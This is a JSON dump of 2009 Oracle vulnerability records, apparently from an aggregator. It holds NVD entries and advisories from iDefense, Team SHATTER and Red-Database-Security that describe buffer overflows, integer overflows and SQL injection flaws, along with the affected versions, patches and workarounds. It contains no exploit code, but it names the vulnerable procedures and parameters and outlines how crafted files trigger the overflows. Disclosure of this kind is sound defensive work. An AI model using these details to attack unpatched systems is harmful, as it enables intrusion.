{"lastseen": "2016-09-03T12:13:11", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the JRockit component in BEA Product Suite R27.6.2 and earlier, with SDK/JRE 1.4.2, JRE/JDK 5, and JRE/JDK 6, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.", "modified": "2012-10-22T23:04:31", "published": "2009-04-15T06:30:00", "id": "CVE-2009-1006", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1006", "type": "cve", "title": "CVE-2009-1006", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T12:12:46", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the SQLX Functions component in Oracle Database 10.2.0.3 and 11.1.0.6 allows remote authenticated users to affect integrity and availability, related to AGGXQIMP.", "modified": "2012-10-22T23:04:24", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0980", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0980", "type": "cve", "title": "CVE-2009-0980", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-18T15:52:31", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Outside In Technology component in Oracle Application Server 8.1.9 allows local users to affect confidentiality, integrity, and availability, related to HTML.", "modified": "2016-11-18T10:22:20", "published": "2009-04-15T06:30:00", "id": "CVE-2009-1009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1009", "title": "CVE-2009-1009", "type": "cve", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-18T15:52:31", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the BI Publisher component in Oracle Application Server 5.6.2, 10.1.3.2.1, and 10.1.3.3.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-0989.", "modified": "2016-11-22T11:10:34", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0990", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0990", "title": "CVE-2009-0990", "type": "cve", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "kaspersky": [{"lastseen": "2019-02-15T12:33:31", "bulletinFamily": "info", "description": "### *Detect date*:\n04/15/2009\n\n### *Severity*:\nHigh\n\n### *Description*:\nUnspecified vulnerabilities were found in the Oracle Database. By exploiting these vulnerabilities malicious users can affect availability, confidentiality and integrity. These vulnerabilities can be exploited remotely via unknown vectors.\n\n### *Affected products*:\nOracle Database versions 10.1.0.5, 10.2.0.4 and 11.1.0.6\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Oracle Database](<https://threats.kaspersky.com/en/product/Oracle-Database/>)\n\n### *CVE-IDS*:\n[CVE-2009-0992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0992>) \n[CVE-2009-0985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0985>)", "modified": "2019-02-13T00:00:00", "published": "2009-04-15T00:00:00", "id": "KLA10282", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10282", "title": "\r KLA10282Multiple vulnerabilities in Oracle Database ", "type": "kaspersky", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDefense Security Advisory 05.14.09\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nMay 14, 2009\r\n\r\nI. BACKGROUND\r\n\r\nOracle Corp.'s Outside In Technology is a document conversion engine\r\nsupporting a large number of binary file formats. Prior to Oracle's\r\nacquisition, the software was maintained by Stellent Inc. The software\r\nappears to have originated from "QuickView" for Windows 98, but later\r\nspun off. It is used by various software packages, one of which is\r\nMotorola Inc.'s Good Mobile Messaging Server. For more information,\r\nvisit the vendors' sites at the URLs provided below.\r\n\r\nhttp://www.oracle.com/technology/products/content-management/oit/oit_all.html\r\n\r\nhttp://www.good.com/corp/index.php\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a buffer overflow vulnerability in Oracle Corp.'s\r\nOutside In Technology, as included in various vendors' software\r\ndistributions, allows attacker to execute arbitrary code.\r\n\r\nThis vulnerability exists due to the lack of bounds checking when\r\nprocessing certain records within a Microsoft Excel spreadsheet. Upon\r\nentering the vulnerable function, data is copied from a heap buffer\r\ninto a stack buffer without ensuring that the data will fit. By\r\ncrafting an Excel spreadsheet file properly, it is possible to write\r\nbeyond the bounds of the stack buffer. The resulting stack corruption\r\nleads to arbitrary code execution.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability allows attackers to execute arbitrary\r\ncode. In order to exploit this vulnerability, the attacker must somehow\r\nsupply a malformed document to an application that will process the\r\ndocument with Outside In Technology. Likewise, the privileges gained\r\nwill also depend on the software using the library.\r\n\r\nIn the case of Good Mobile Messaging Server, an attacker can send an\r\nelectronic mail message with an Excel spreadsheet attachment to a user.\r\nWhen the user chooses to view the spreadsheet, the vulnerable condition\r\nwill be triggered. Upon successful exploitation, the attacker will gain\r\nthe privileges of the "GoodAdmin" user. This is a special user account\r\nwhich, in some configurations, may be a member of the "Administrator"\r\ngroup. Regardless of the user's "Administrator" status, the user will\r\nalways have full privileges to "Read" and "Send As" all users on the\r\nMicrosoft Exchange server. This could allow an attacker to conduct\r\nfurther social engineering attacks.\r\n\r\nOther software packages using Outside In were not investigated.\r\n\r\nIt is interesting to note that this vulnerability was fixed some time\r\nbetween the release of version 8.1.5 and version 8.1.9. No public\r\nrecord exists documenting the existence of this vulnerability.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of this vulnerability using the follow\r\nversions of Outside In on Windows Server 2003.\r\n\r\n 8.1.5.4282\r\n\r\nAdditionally the following versions of Good Mobile Messaging Server for\r\nExchange ship with vulnerable versions of vsxl5.dll.\r\n\r\n 4.9.3.41\r\n\r\nAll prior versions of Outside In, including versions for operating\r\nsystems other than Windows, are assumed to be vulnerable. Additionally,\r\nall software that includes or uses affected versions of Outside In is\r\nassumed to be vulnerable. Earlier versions, including those branded\r\nwith other names, are vulnerable as well.\r\n\r\niDefense confirmed that the following versions are not affected:\r\n\r\n 8.1.9.4417 (shipped with GMMS 5.0.4.28 and GMMS 6.0.0.106)\r\n 8.2.2.4866\r\n 8.3.0.5129\r\n\r\nV. WORKAROUND\r\n\r\nIn order to prevent exploitation of this vulnerability, iDefense\r\nrecommends using file system access control lists (ACLs) to prevent\r\nreading the affected module.\r\n\r\nFor Good Mobile Messaging Server, Good Software recommends deleting the\r\nGdFileConv.exe file and restarting the Messaging Server.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle has released a patch which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nGood Technology has released a patch which addresses this issue. For\r\nmore information, consult their advisory at the following URL:\r\n\r\nhttp://www.good.com/faq/18431.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2009-1009 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n01/30/2009 - GoodLink contact identified\r\n01/30/2009 - Security contact research begins\r\n02/05/2009 - Oracle contact identified\r\n02/09/2009 - Initial Oracle Reply\r\n02/09/2009 - Initial Vendor Notification\r\n02/10/2009 - Initial GoodLink Reply\r\n02/11/2009 - Oracle validation\r\n02/16/2009 - GoodLink customer alert sent\r\n02/16/2009 - GoodLink validation\r\n02/19/2009 - Oracle requests PoC\r\n02/19/2009 - PoC sent to Oracle\r\n02/25/2009 - GoodLink status update\r\n02/27/2009 - Oracle status update\r\n03/06/2009 - GoodLink status update\r\n04/14/2009 - Oracle patch released\r\n05/13/2009 - CVE Corelation requested from Oracle\r\n05/14/2009 - Coordinated Public Disclosure\r\n05/14/2009 - GoodLink ready for disclosure coordinated with iDefense\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was discovered by Joshua J. Drake, iDefense Labs.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2009 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKDc5Sbjs6HoxIfBkRAmuQAKCIbWEf7snT1hbZim+Tcug/6P0vZACdFPij\r\nTvLxJSUqv/vKW37aj1rG7g8=\r\n=Rbbs\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2009-05-18T00:00:00", "published": "2009-05-18T00:00:00", "id": "SECURITYVULNS:DOC:21836", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21836", "title": "iDefense Security Advisory 05.14.09: Multiple Vendor Outside In Spreadsheet Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDefense Security Advisory 05.14.09\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nMay 14, 2009\r\n\r\nI. BACKGROUND\r\n\r\nOracle Corp.'s Outside In Technology is a document conversion engine\r\nsupporting a large number of binary file formats. Prior to Oracle's\r\nacquisition, the software was maintained by Stellent Inc. The software\r\nappears to have originated from "QuickView" for Windows 98, but later\r\nspun off. It is used by various software packages, one of which is\r\nMotorola Inc.'s Good Mobile Messaging Server. For more information,\r\nvisit the vendors' sites at the URLs provided below.\r\n\r\nhttp://www.oracle.com/technology/products/content-management/oit/oit_all.html\r\n\r\nhttp://www.good.com/corp/index.php\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of multiple buffer overflow vulnerabilities in\r\nOracle Corp.'s Outside In Technology, as included in various vendors'\r\nsoftware distributions, allow attackers to execute arbitrary code.\r\n\r\nTwo vulnerabilities exist due to a lack of bounds checking when\r\nprocessing specially crafted Microsoft Excel spreadsheet files. The two\r\nissues exist in two distinct functions. The two vulnerabilities are\r\nnearly identical, with the differentiating factor being the value of a\r\nflag bit within a record of the file. If the bit is set, the code path\r\nto the first vulnerable function is taken. Otherwise, the code path to\r\nthe second vulnerable function is taken.\r\n\r\nThe cause of the vulnerability is the same in each case. An array of\r\nstructures, stored on the stack, is manipulated in a loop without\r\nvalidating the bounds of the array. By crafting a file containing a\r\nproperly malformed record, it is possible to write outside the bounds\r\nof this array. The resulting stack corruption can lead to arbitrary\r\ncode execution.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of these vulnerabilities allows attackers to execute\r\narbitrary code. In order to exploit these vulnerabilities, the attacker\r\nmust somehow supply a malformed document to an application that will\r\nprocess the document with Outside In Technology. Likewise, the\r\nprivileges gained will also depend on the software using the library.\r\n\r\nIn the case of Good Mobile Messaging Server, an attacker can send an\r\nelectronic mail message with an Excel spreadsheet attachment to a user.\r\nWhen the user chooses to view the spreadsheet, the vulnerable condition\r\nwill be triggered. Upon successful exploitation, the attacker will gain\r\nthe privileges of the "GoodAdmin" user. This is a special user account\r\nwhich, in some configurations, may be a member of the "Administrator"\r\ngroup. Regardless of the user's "Administrator" status, the user will\r\nalways have full privileges to "Read" and "Send As" all users on the\r\nMicrosoft Exchange server. This could allow an attacker to conduct\r\nfurther social engineering attacks.\r\n\r\nOther software packages using Outside In were not investigated.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of these vulnerabilities using the\r\nfollow versions of Outside In on Windows Server 2003 SP2.\r\n\r\n 8.1.5.4282\r\n 8.1.9.4417\r\n 8.2.2.4866\r\n 8.3.0.5129\r\n\r\nAdditionally the following versions of Good Mobile Messaging Server for\r\nExchange ship with vulnerable versions of vsxl5.dll.\r\n\r\n 4.9.3.41\r\n 5.0.4.28\r\n 6.0.0.106\r\n\r\nAll versions of Outside In, including versions for operating systems\r\nother than Windows, are assumed to be vulnerable. Additionally, all\r\nsoftware that includes or uses Outside In is assumed to be vulnerable.\r\nEarlier versions, including those branded with other names, are\r\nvulnerable as well.\r\n\r\nV. WORKAROUND\r\n\r\nIn order to prevent exploitation of this vulnerability, iDefense\r\nrecommends using file system access control lists (ACLs) to prevent\r\nreading the affected module.\r\n\r\nFor Good Mobile Messaging Server, Good Software recommends deleting the\r\nGdFileConv.exe file and restarting the Messaging Server.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle has released a patch which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nGood Technology has released a patch which addresses this issue. For\r\nmore information, consult their advisory at the following URL:\r\n\r\nhttp://www.good.com/faq/18431.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2009-1009 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n01/30/2009 - GoodLink contact identified\r\n01/30/2009 - Security contact research begins\r\n02/05/2009 - Oracle contact identified\r\n02/09/2009 - Initial Oracle Reply\r\n02/09/2009 - Initial Vendor Notification\r\n02/10/2009 - Initial GoodLink Reply\r\n02/11/2009 - Oracle validation\r\n02/16/2009 - GoodLink customer alert sent\r\n02/16/2009 - GoodLink validation\r\n02/19/2009 - Oracle requests PoC\r\n02/19/2009 - PoC sent to Oracle\r\n02/25/2009 - GoodLink status update\r\n02/27/2009 - Oracle status update\r\n03/06/2009 - GoodLink status update\r\n04/14/2009 - Oracle patch released\r\n05/13/2009 - CVE Corelation requested from Oracle\r\n05/14/2009 - Coordinated Public Disclosure\r\n05/14/2009 - GoodLink ready for disclosure coordinated with iDefense\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was discovered by Joshua J. Drake, iDefense Labs.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2009 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKDc+jbjs6HoxIfBkRAvY9AJ9WjWSDZK8tmiaAo5tLkrRZrDDscwCeJ8qk\r\n0aG0K5EpST6rBQF7jgOIhC8=\r\n=94Xc\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2009-05-18T00:00:00", "published": "2009-05-18T00:00:00", "id": "SECURITYVULNS:DOC:21837", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21837", "title": "iDefense Security Advisory 05.14.09: Multiple Vendor Outside In Multiple Spreadsheet Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nTeam SHATTER Security Advisory\r\n\r\nBuffer Overflow in Resource Manager of Oracle Database - Plan name parameter\r\n\r\nAugust 27, 2009\r\n\r\nRisk Level:\r\nMedium\r\n\r\nAffected versions:\r\nOracle Database Server version 9iR1 and 9iR2\r\n\r\nRemote exploitable:\r\nYes (Authentication to Database Server is needed)\r\n\r\nCredits:\r\nThis vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security\r\nInc.\r\n\r\nDetails:\r\nThe plan name parameter used in ALTER SYSTEM SET RESOURCE_MANAGER_PLAN statement and in\r\nSYS.DBMS_RESOURCE_MANAGER.SWITCH_PLAN procedure is vulnerable to buffer overflow attacks. When\r\npassing an overly long plan name string a buffer can be overflowed.\r\n\r\nImpact:\r\nTo exploit this vulnerability it is required to have ALTER SYSTEM privilege. Exploitation of this\r\nvulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DoS\r\n(Denial of service) killing the Oracle server process.\r\n\r\nVendor Status:\r\nVendor was contacted and a patch was released.\r\n\r\nWorkaround:\r\nRestrict ALTER SYSTEM privilege.\r\n\r\nFix:\r\nApply Oracle Critical Patch Update July 2009 available at Oracle Metalink.\r\n\r\nCVE:\r\nCVE-2009-0979\r\n\r\nLinks:\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html\r\n\r\nTimeline:\r\nVendor Notification - 8/15/2007\r\nFix - 07/14/2009\r\nPublic Disclosure - 08/07/2009\r\n\r\nApplication Security, Inc's database security solutions have helped over 1,600 organizations secure\r\ntheir databases from all internal and external threats while also ensuring that those organizations\r\nmeet or exceed regulatory compliance and audit requirements.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate at the time of publishing\r\nbased on currently available information. Use of the information constitutes acceptance for use in an\r\nAS IS condition. There are no warranties with regard to this information. Neither the author nor the\r\npublisher accepts any liability for any direct, indirect, or consequential loss or damage arising\r\nfrom use of, or reliance on, this information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32) - WinPT 1.2.0\r\n\r\niD8DBQFKl/WO9EOAcmTuFN0RAsAOAJ0cy+JPiZ0vZ2YyMeEpq539Gmu3/gCfVH6N\r\nyK2AcG2SQHNh90hQgkAAgv8=\r\n=alV+\r\n-----END PGP SIGNATURE-----", "modified": "2009-08-28T00:00:00", "published": "2009-08-28T00:00:00", "id": "SECURITYVULNS:DOC:22390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22390", "title": "Team SHATTER Security Advisory: Buffer Overflow in Resource Manager of Oracle Database - Plan name parameter", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "Name SQL Injection in package DBMS_AQIN [CVE-2009-0992]\r\nSystems Affected Oracle 10.1.0.5 - 11.1.0.7\r\nSeverity High Risk\r\nCategory SQL Injection\r\nVendor URL http://www.oracle.com/\r\nAuthor Alexander Kornbrust (ak at red-database-security.com)\r\nCVE CVE-2009-0992\r\nAdvisory 14 April 2009 (V 1.00)\r\n\r\nDetails:\r\nThe package DBMS_AQIN contains a SQL injection vulnerability in the procedure DEQ_EXEJOB. \r\nAdditional information is available in the following advisory.\r\n\r\n\r\nAdvisory:\r\nhttp://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqin.html\r\n\r\n\r\nPatch Information:\r\nApply the patches for Oracle CPU April 2009.\r\n\r\n\r\nVerification:\r\nOur Oracle database scanner Repscan was updated with the information from the Oracle\r\nCPU April 2009 and can identify vulnerable databases. \r\nMore Information about Repscan can be found here:\r\nhttp://www.sentrigo.com/repscan\r\n\r\n\r\nHistory:\r\n14-apr-2009 Oracle published CPU April 2009 [CVE-]\r\n14-apr-2009 Advisory published\r\n\r\n\r\nAbout Red-Database-Security:\r\nRed-Database-Security is the leading company for Oracle security. Within the last \r\n6 years we reported several hundred vulnerabilities to Oracle.\r\n\r\n--\r\n(c) 2009 by Red-Database-Security GmbH\r\nhttp://www.red-database-security.com", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "id": "SECURITYVULNS:DOC:21666", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21666", "title": "SQL Injection in package DBMS_AQIN", "type": "securityvulns", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDefense Security Advisory 05.14.09\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nMay 14, 2009\r\n\r\nI. BACKGROUND\r\n\r\nOracle Corp.'s Outside In Technology is a document conversion engine\r\nsupporting a large number of binary file formats. Prior to Oracle's\r\nacquisition, the software was maintained by Stellent Inc. The software\r\nappears to have originated from "QuickView" for Windows 98, but later\r\nspun off. It is used by various software packages, one of which is\r\nMotorola Inc.'s Good Mobile Messaging Server. For more information,\r\nvisit the vendors' sites at the URLs provided below.\r\n\r\nhttp://www.oracle.com/technology/products/content-management/oit/oit_all.html\r\n\r\nhttp://www.good.com/corp/index.php\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of multiple integer overflow vulnerabilities in\r\nOracle Corp.'s Outside In Technology, as included in various vendors'\r\nsoftware distributions, allows attacker to execute arbitrary code.\r\n\r\nThese vulnerabilities exist in the handling of an optional data stream\r\nstored within various files. Both issues are integer overflows, and are\r\nwithin the same function.\r\n\r\nWithin the vulnerable function, an integer value is read from the\r\nMicrosoft Office file. This value is later used in several arithmetic\r\ninteger calculations. Since no validation is performed, integer\r\noverflows can occur. The result is the allocation of a buffer that is\r\ntoo small to hold the data that is subsequently read from the file. A\r\nheap buffer overflow occurs, leading to an exploitable condition.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of these vulnerabilities allows attackers to execute\r\narbitrary code. In order to exploit these vulnerabilities, the attacker\r\nmust somehow supply a malformed document to an application that will\r\nprocess the document with Outside In Technology. Likewise, the\r\nprivileges gained will also depend on the software using the library.\r\n\r\nIn the case of Good Mobile Messaging Server, an attacker can send an\r\nelectronic mail message with a specially crafted Office document\r\nattachment to a user. When the user chooses to view the document, the\r\nvulnerable condition will be triggered. Upon successful exploitation,\r\nthe attacker will gain the privileges of the "GoodAdmin" user. This is\r\na special user account which, in some configurations, may be a member\r\nof the "Administrator" group. Regardless of the user's "Administrator"\r\nstatus, the user will always have full privileges to "Read" and "Send\r\nAs" all users on the Microsoft Exchange server. This could allow an\r\nattacker to conduct further social engineering attacks.\r\n\r\nOther software packages using Outside In were not investigated.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of these vulnerabilities using the\r\nfollow versions of Outside In on Windows Server 2003. Multiple modules\r\nwere confirmed to contain the vulnerable code; vsmpp, vspp97, vsvisio,\r\nvsw6, vsw97, vsxl5. Other modules may also be affected.\r\n\r\n 8.1.5.4282\r\n 8.1.9.4417\r\n 8.2.2.4866\r\n 8.3.0.5129\r\n\r\nAdditionally the following versions of Good Mobile Messaging Server for\r\nExchange ship with vulnerable versions of the affected modules.\r\n\r\n 4.9.3.41\r\n 5.0.4.28\r\n 6.0.0.106\r\n\r\nAll versions of Outside In, including versions for operating systems\r\nother than Windows, are assumed to be vulnerable. Additionally, all\r\nsoftware that includes or uses Outside In is assumed to be vulnerable.\r\nEarlier versions, including those branded with other names, are\r\nvulnerable as well.\r\n\r\nV. WORKAROUND\r\n\r\nIn order to prevent exploitation of this vulnerability, iDefense\r\nrecommends using file system access control lists (ACLs) to prevent\r\nreading the affected modules.\r\n\r\nFor Good Mobile Messaging Server, Good Software recommends deleting the\r\nGdFileConv.exe file and restarting the Messaging Server.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle has released a patch which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nGood Technology has released a patch which addresses this issue. For\r\nmore information, consult their advisory at the following URL:\r\n\r\nhttp://www.good.com/faq/18431.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2009-1011 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n01/30/2009 - GoodLink contact identified\r\n01/30/2009 - Security contact research begins\r\n02/05/2009 - Oracle contact identified\r\n02/09/2009 - Initial Oracle Reply\r\n02/09/2009 - Initial Vendor Notification\r\n02/10/2009 - Initial GoodLink Reply\r\n02/11/2009 - Oracle validation\r\n02/16/2009 - GoodLink customer alert sent\r\n02/16/2009 - GoodLink validation\r\n02/19/2009 - Oracle requests PoC\r\n02/19/2009 - PoC sent to Oracle\r\n02/25/2009 - GoodLink status update\r\n02/27/2009 - Oracle status update\r\n03/06/2009 - GoodLink status update\r\n04/14/2009 - Oracle patch released\r\n05/13/2009 - CVE Corelation requested from Oracle\r\n05/14/2009 - Coordinated Public Disclosure\r\n05/14/2009 - GoodLink ready for disclosure coordinated with iDefense\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was discovered by Joshua J. Drake, iDefense Labs.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2009 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKDci2bjs6HoxIfBkRAgoMAJ9LZYN8mlXP7dHp866JUjOllL/2igCfYTU/\r\nxIe37mYPMzb4hra6BAUZrn8=\r\n=az7z\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2009-05-18T00:00:00", "published": "2009-05-18T00:00:00", "id": "SECURITYVULNS:DOC:21834", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21834", "title": "iDefense Security Advisory 05.14.09: Multiple Vendor Outside In Multiple Integer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "Name SQL Injection in package DBMS_AQADM_SYS [CVE-2009-0977]\r\nSystems Affected Oracle 9.2.0.8 - 10.2.0.3\r\nSeverity Medium Risk\r\nCategory SQL Injection\r\nVendor URL http://www.oracle.com/\r\nAuthor Franz Hüll (fh at red-database-security.com)\r\nCVE CVE-2009-0977\r\nAdvisory 14 April 2009 (V 1.00)\r\n\r\n\r\nDetails:\r\nThe package DBMS_AQADM_SYS contains a SQL injection vulnerability in the procedure\r\nGRANT_TYPE_ACCESS.\r\n\r\nAdditional information is available in the following advisory.\r\n\r\nAdvisory:\r\nhttp://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html\r\n\r\n\r\nPatch Information:\r\nApply the patches for Oracle CPU April 2009.\r\n\r\n\r\nVerification:\r\nOur Oracle database scanner Repscan was updated with the information from the Oracle\r\nCPU April 2009 and can identify vulnerable databases. \r\nMore Information about Repscan can be found here:\r\nhttp://www.sentrigo.com/repscan\r\n\r\n\r\nHistory:\r\n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0977]\r\n14-apr-2009 Advisory 